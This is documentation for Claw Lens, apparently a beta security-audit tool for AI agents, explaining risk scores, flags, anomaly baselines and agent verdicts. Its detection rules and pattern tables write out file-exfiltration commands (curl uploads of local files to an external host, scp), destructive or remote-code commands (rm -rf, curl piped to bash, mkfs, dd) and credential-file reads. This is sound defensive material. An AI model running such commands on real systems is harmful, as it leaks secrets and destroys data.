Risk Scoring - Claw Lens

Security Audit is a beta feature. Detection coverage and UI are evolving — feedback is welcome.

Every audit event receives a risk score from 0 to 3. The score determines the event’s risk level — high, medium, or low — and feeds into the per-agent verdict. This page explains what triggers each level, what the risk flags mean, and how agent verdicts are assigned.

Risk levels

High

Score = 3. Confirmed damage or an active attack. Act immediately.

Medium

Score = 2. Confirmed exposure, no confirmed damage yet. Review soon.

Low

Score = 1. Behavioral anomaly or pattern worth noting. Review periodically.

High risk triggers

An event is scored high (3) when any of the following flags are set:

exfil_pattern: A shell command explicitly sent local file content to an external URL. The data has already left the machine. Patterns that trigger this flag:

curl -F file=@/path/to/file https://external.example.com
curl --data-binary @/path/to/file https://external.example.com
curl --upload-file /path/to/file https://external.example.com
cat /path/to/file | curl -X POST -d @- https://external.example.com
scp /local/file user@remote:/path
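As a rough illustration of how the example commands above could be recognised, the following sketch matches them with regular expressions. The pattern list and the `has_exfil_pattern` helper are hypothetical and modelled only on the five examples shown; the rules Claw Lens actually uses are not documented on this page.

```python
import re

# Hypothetical patterns, derived only from the example commands above.
EXFIL_PATTERNS = [
    # curl -F file=@/path/to/file ...
    re.compile(r"\bcurl\b.*\s(-F|--form)\s+\S*=@\S+"),
    # curl --data-binary @/path/to/file ...  or  ... | curl -d @- ...
    re.compile(r"\bcurl\b.*\s(-d|--data|--data-binary)\s+@\S+"),
    # curl --upload-file /path/to/file ...
    re.compile(r"\bcurl\b.*\s(-T|--upload-file)\s+\S+"),
    # scp /local/file user@remote:/path
    re.compile(r"\bscp\b\s+.*\S+@\S+:\S*"),
]


def has_exfil_pattern(command: str) -> bool:
    """Return True if the command resembles one of the upload patterns."""
    return any(p.search(command) for p in EXFIL_PATTERNS)
```

A plain download such as `curl https://external.example.com` matches none of these patterns. The sketch does not check whether the destination is actually external.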

critical_cmd — A destructive or system-altering shell command was executed. Commands in this category:

Pattern	Risk
`rm -rf`	Recursive forced deletion
`curl/wget | bash` or `curl/wget | sh`	Remote code execution
`chmod +s`	Sets the SUID bit
`chmod 777`	World-writable permissions
`dd if=... of=/dev/...`	Direct disk write
`iptables -F`	Flushes the firewall
`mkfs`	Formats a filesystem
`echo ... > /etc/`	Writes to system configuration
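The table above can be read as a set of pattern checks on the command string. The sketch below is one possible encoding, assuming simple regular expressions. The `CRITICAL_PATTERNS` names and the `critical_matches` helper are illustrative and are not the product's rule definitions.

```python
import re

# Hypothetical regexes approximating the rows of the table above.
CRITICAL_PATTERNS = {
    "rm -rf": re.compile(r"\brm\s+-(rf|fr)\b"),
    "pipe to shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh)\b"),
    "chmod +s": re.compile(r"\bchmod\s+\+s\b"),
    "chmod 777": re.compile(r"\bchmod\s+777\b"),
    "dd to device": re.compile(r"\bdd\b.*\bof=/dev/"),
    "iptables -F": re.compile(r"\biptables\s+-F\b"),
    "mkfs": re.compile(r"\bmkfs\b"),
    "write to /etc": re.compile(r"\becho\b.*>\s*/etc/"),
}


def critical_matches(command: str) -> list[str]:
    """Return the names of all critical patterns found in the command."""
    return [name for name, rx in CRITICAL_PATTERNS.items() if rx.search(command)]
```

Under these assumptions, any non-empty result would correspond to the `critical_cmd` flag being set.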

prompt_injection: An injection pattern was detected in agent input. All prompt injection findings are scored high regardless of other context. See Audit Rules for the full pattern list.

Confirmed credential exfiltration: A credential was found in agent output and the same session subsequently made an external network call. Claw Lens correlates these two events and flags the finding as a potential exfiltration path.
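The correlation described for credential exfiltration can be pictured as a single pass over a session's events in time order. This is a minimal sketch, assuming a hypothetical `Event` record with `session_id`, `flags`, and `external_call` fields. None of these names come from Claw Lens itself.

```python
from dataclasses import dataclass, field


@dataclass
class Event:
    # Hypothetical event shape, used for illustration only.
    session_id: str
    flags: set = field(default_factory=set)
    external_call: bool = False


def sessions_with_possible_exfil(events):
    """Return ids of sessions where a credential exposure precedes an external call.

    Events are assumed to be in chronological order.
    """
    exposed = set()   # sessions in which a credential has already appeared
    flagged = set()
    for ev in events:
        # Check the call first so only *later* calls count as "subsequent".
        if ev.external_call and ev.session_id in exposed:
            flagged.add(ev.session_id)
        if "sensitive_data" in ev.flags:
            exposed.add(ev.session_id)
    return flagged
```

An external call that happens before the credential appears, or in a different session, is not correlated in this sketch.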

Medium risk triggers

An event is scored medium (2) when any of the following flags are set:

sensitive_data: A credential, API key, token, password, or private key appeared in tool output. The secret was exposed in the agent’s context but has not been confirmed as sent externally. See Credential Inventory for the full list of detected patterns.

elevated_cmd: A high-privilege shell command was executed. Commands in this category:

Pattern	Examples
`sudo`	Any sudo invocation
`ssh` / `scp` / `rsync`	Remote connections and transfers
`curl` / `wget`	Any outbound HTTP request in a shell
`nc` / `netcat` / `ftp`	Raw network connections
`cat .env` / `cat passwd` / `cat shadow`	Reading credential files via shell
`chown root`	Changing ownership to root

new_domain: The agent contacted a domain that does not appear in its baseline history. Domains are tracked per agent; a domain moves from “new” to “known” once it appears in the agent’s 30-day baseline data.

sensitive_path_medium: The agent accessed a path matching a medium-severity sensitive path rule (e.g., **/id_rsa, **/.env, **/Library/Keychains/**). See Audit Rules for the full path rule table.
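To show how glob-style path rules of this kind might be evaluated, the sketch below checks a path against the medium-severity examples first and then against the low-severity examples listed under Low risk triggers. It uses Python's `fnmatchcase`, in which `*` also matches `/`, so `**` behaves as an ordinary wildcard here. The real matcher's glob semantics may differ, and the full rule table lives in Audit Rules.

```python
from fnmatch import fnmatchcase

# Only the example rules quoted on this page; not the full rule table.
MEDIUM_RULES = ["**/id_rsa", "**/.env", "**/Library/Keychains/**"]
LOW_RULES = ["**/.ssh/**", "**/*.env", "**/*token*"]


def sensitive_path_flag(path: str):
    """Return the flag name for the most severe matching rule, or None.

    This sketch ignores whether a credential was found in the output.
    """
    if any(fnmatchcase(path, rule) for rule in MEDIUM_RULES):
        return "sensitive_path_medium"
    if any(fnmatchcase(path, rule) for rule in LOW_RULES):
        return "sensitive_path"
    return None
```

Checking the medium rules first means a path such as `/home/dev/.ssh/id_rsa`, which matches rules in both tiers, is reported at the higher severity. That ordering is an assumption of this sketch.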

Low risk triggers

An event is scored low (1) when any of the following flags are set:

sensitive_path: The agent accessed a path matching a low-severity sensitive path rule (e.g., **/.ssh/**, **/*.env, **/*token*) without a credential being found in the output.

anomaly_hour: The agent was active at an hour outside its typical active hours as recorded in the baseline.

anomaly_volume: The session’s total tool call count exceeded three times the agent’s average tool calls per session.

anomaly_path: The agent accessed a filesystem directory it has not accessed in the baseline period.
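The three anomaly checks reduce to simple comparisons against baseline values. The following sketch assumes the baseline is available as plain Python values. The function name and parameters are hypothetical, and treating "not accessed in the baseline period" as "not in a set of baseline directories" is a simplification.

```python
def anomaly_flags(hour, tool_calls, directory,
                  typical_hours, avg_tool_calls, typical_paths):
    """Return the set of anomaly flags for one observation.

    hour           -- hour of day (0-23) at which the agent was active
    tool_calls     -- total tool calls in the current session
    directory      -- filesystem directory that was accessed
    The remaining arguments are assumed baseline values for the agent.
    """
    flags = set()
    if hour not in typical_hours:
        flags.add("anomaly_hour")
    # "Exceeded three times the average" is read as a strict comparison.
    if tool_calls > 3 * avg_tool_calls:
        flags.add("anomaly_volume")
    if directory not in typical_paths:
        flags.add("anomaly_path")
    return flags
```

With an average of 12 tool calls per session, a session with exactly 36 calls would not be flagged under this reading, while one with 37 would.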

Risk flags reference

All flags that can appear on an event:

Flag	Level	Trigger
`exfil_pattern`	High	Shell command uploads file content to external URL
`critical_cmd`	High	Destructive shell command (`rm -rf`, `mkfs`, etc.)
`prompt_injection`	High	Injection pattern detected in agent input
`sensitive_data`	Medium	Credential or secret found in tool output
`elevated_cmd`	Medium	Privileged command (`sudo`, `ssh`, `curl`, etc.)
`new_domain`	Medium	External call to a domain not in baseline
`sensitive_path_medium`	Medium	Access to a medium-severity sensitive path
`sensitive_path`	Low	Access to a low-severity sensitive path
`anomaly_hour`	Low	Activity outside typical hours
`anomaly_volume`	Low	Session tool call count > 3× baseline average
`anomaly_path`	Low	Access to a directory not in baseline
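Because an event reaches a level when any flag at that level is set, one way to picture the event score is as the maximum level among its flags. The sketch below encodes the table above as a lookup. Returning 0 for an event with no flags is an assumption, since this page defines only scores 1 to 3.

```python
# Flag-to-score mapping taken from the table above.
FLAG_LEVELS = {
    "exfil_pattern": 3,
    "critical_cmd": 3,
    "prompt_injection": 3,
    "sensitive_data": 2,
    "elevated_cmd": 2,
    "new_domain": 2,
    "sensitive_path_medium": 2,
    "sensitive_path": 1,
    "anomaly_hour": 1,
    "anomaly_volume": 1,
    "anomaly_path": 1,
}

LEVEL_NAMES = {3: "high", 2: "medium", 1: "low"}


def score_event(flags):
    """Return the highest score among the event's flags (0 if none; assumed)."""
    return max((FLAG_LEVELS[f] for f in flags), default=0)
```

For example, an event carrying both `anomaly_hour` and `elevated_cmd` would score 2 (medium) under this model. An unknown flag name raises `KeyError`.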

Anomaly detection and baselines

Low-risk anomaly flags are relative to each agent’s individual baseline. The baseline is built from the agent’s last 30 days of activity and captures:

typical_hours — the 12 most active hours of day
avg_tool_calls_per_session — the mean number of tool calls across all sessions
typical_paths — the 20 most-accessed filesystem directories
known_domains — all external domains the agent has contacted

When an event deviates from the baseline on any of these dimensions, the corresponding anomaly flag is set. Baselines are rebuilt automatically as new sessions come in, so a new domain or new path eventually becomes part of the baseline if the agent accesses it consistently.

Anomaly flags are only set when a baseline exists. A new agent with no history will not trigger anomaly flags until enough sessions have been recorded to build one.
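The baseline fields described above could be derived from session history roughly as follows. This is a sketch under stated assumptions: each session is a dict with hypothetical `hours`, `tool_calls`, `paths`, and `domains` keys, and the caller has already limited the input to the last 30 days.

```python
from collections import Counter
from statistics import mean


def build_baseline(sessions):
    """Build a baseline dict from recent sessions, or None if there is no history.

    Each session is assumed to look like:
    {"hours": [9, 10], "tool_calls": 14, "paths": ["/srv/app"], "domains": ["api.example.com"]}
    """
    if not sessions:
        return None  # no baseline, so no anomaly flags can be set
    hour_counts = Counter(h for s in sessions for h in s["hours"])
    path_counts = Counter(p for s in sessions for p in s["paths"])
    return {
        "typical_hours": {h for h, _ in hour_counts.most_common(12)},
        "avg_tool_calls_per_session": mean([s["tool_calls"] for s in sessions]),
        "typical_paths": {p for p, _ in path_counts.most_common(20)},
        "known_domains": {d for s in sessions for d in s["domains"]},
    }
```

Rebuilding the baseline from a sliding window like this is what would let a consistently used domain or path become part of the baseline over time.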

Agent Risk Level

The Agent Security tab assigns each agent one of three verdicts based on its active (non-dismissed) findings:

Verdict	Meaning
`safe`	No active findings
`caution`	Has medium or low severity active findings
`unsafe`	Has high severity findings, or any active prompt injection finding

Agent Risk Level is driven by the severity of the underlying findings, not raw event counts. Dismissing a finding updates the risk level: if the last high-severity finding on an agent is dismissed, the verdict may drop from unsafe to caution or safe.
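The verdict rules in the table above can be sketched as a small function over an agent's findings. The finding shape used here (dicts with `severity`, `type`, and `dismissed` keys) is hypothetical and chosen only for illustration.

```python
def agent_verdict(findings):
    """Return 'safe', 'caution', or 'unsafe' from an agent's findings.

    Each finding is assumed to be a dict such as
    {"severity": "high", "type": "critical_cmd", "dismissed": False}.
    """
    active = [f for f in findings if not f.get("dismissed", False)]
    if any(f["severity"] == "high" or f.get("type") == "prompt_injection"
           for f in active):
        return "unsafe"
    if active:
        return "caution"  # only medium or low findings remain
    return "safe"
```

Dismissing the only high-severity finding changes the result from `unsafe` to `caution` if other findings are still active, or to `safe` if none are.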
